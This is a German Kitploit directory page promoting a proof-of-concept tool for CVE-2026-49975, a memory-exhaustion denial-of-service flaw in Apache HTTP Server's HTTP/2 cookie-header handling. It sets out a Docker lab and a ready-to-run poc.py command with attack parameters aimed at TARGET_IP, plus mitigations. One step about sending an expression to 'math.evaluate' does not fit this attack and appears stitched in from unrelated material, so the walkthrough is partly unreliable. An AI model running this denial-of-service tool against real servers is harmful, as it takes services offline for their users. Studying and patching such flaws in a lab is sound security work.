Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-49975 — HTTP/2 Bomb | Kitploit
Tools/GitHubGitHub/eqstlab/cve-2026-49975
Vulnerability AnalysisExploitationWeb SecurityFuzzingPenetration Testing
GitHubeqstlab/cve-2026-49975

CVE-2026-49975

HTTP/2 Bomb

Repository anzeigen
143vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-49975 HTTP/2 Bomb

★ CVE-2026-49975 HTTP/2 Bomb PoC ★

https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74


Übersicht

CVE-2026-49975 ist eine Denial-of-Service (DoS)-Schwachstelle im Apache HTTP Server. Die Schwachstelle tritt im HTTP/2-Anforderungsverarbeitungspfad auf, bei dem mehrere cookie-Headerfelder zusammengeführt werden können, ohne ordnungsgemäß gegen LimitRequestFields gezählt zu werden. Durch Senden einer kleinen HPACK-kodierten HTTP/2-Anforderung, die sich in viele cookie-Headerfelder aufteilt, kann ein Angreifer den Server zwingen, während der Zusammenführung von Cookie-Headern wiederholt Speicher zu allozieren. Der Angreifer kann dann die HTTP/2-Flusskontrolle nutzen, um die Übertragung von Antworten zu verzögern, die betroffenen Streams offen zu halten und so die Freigabe des allozierten Speichers zu verhindern.


Betroffene Versionen

KategorieVersion
VerwundbarApache HTTP Server 2.4.17 ≤ Version ≤ 2.4.67
GepatchtApache HTTP Server 2.4.68 oder höher

Auswirkungen

  • Remote Denial of Service (DoS)
  • Übermäßiger Speicherverbrauch
  • Verzögerte oder fehlgeschlagene Verarbeitung normaler Benutzeranfragen

Umgebung

Erstellen und starten Sie die verwundbare Apache HTTP Server-Umgebung.

root@kitploit:~
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975

PoC

Starten Sie die verwundbare Umgebung und folgen Sie den nachstehenden Schritten, um den Angriff zu reproduzieren.

Schritt 1. Überwachen der Serverspeichernutzung

root@kitploit:~
docker stats cve-2026-49975

Beispielausgabe:

root@kitploit:~
CONTAINER ID   NAME             CPU %   MEM USAGE / LIMIT     MEM %
xxxxxxxxxxxx   cve-2026-49975   0.5%    35.2MiB / 8.0GiB      1.7%

Schritt 2. Ausführen des HTTP/2 Bomb PoC

Senden Sie den folgenden Ausdruck an math.evaluate (z. B. über die Berechnungseingabe der Anwendung).

root@kitploit:~
python3 poc.py \
  --host TARGET_IP \
  --port 10081 \
  --connections 10 \
  --streams 100 \
  --refs 4091 \
  --initial-window 0 \
  --hold 300 \
  --drip-interval 2 \
  --drip-bytes 1

Schritt 3. Bestätigen des Ergebnisses

Überprüfen Sie, ob der Speicherverbrauch des Apache-Containers ansteigt und hoch bleibt, während die Angriffsstreams offen gehalten werden.

Gegenmaßnahmen

  • Aktualisieren Sie Apache HTTP Server auf 2.4.68 oder höher
  • Erwägen Sie, HTTP/2 vorübergehend zu deaktivieren, falls der Dienst es nicht benötigt

Analyse

  • KR: https://www.skshieldus.com/security-insights/reports/eqst-apache-http2-dos-cve-2026-49975
  • EN:
Tool herunterladen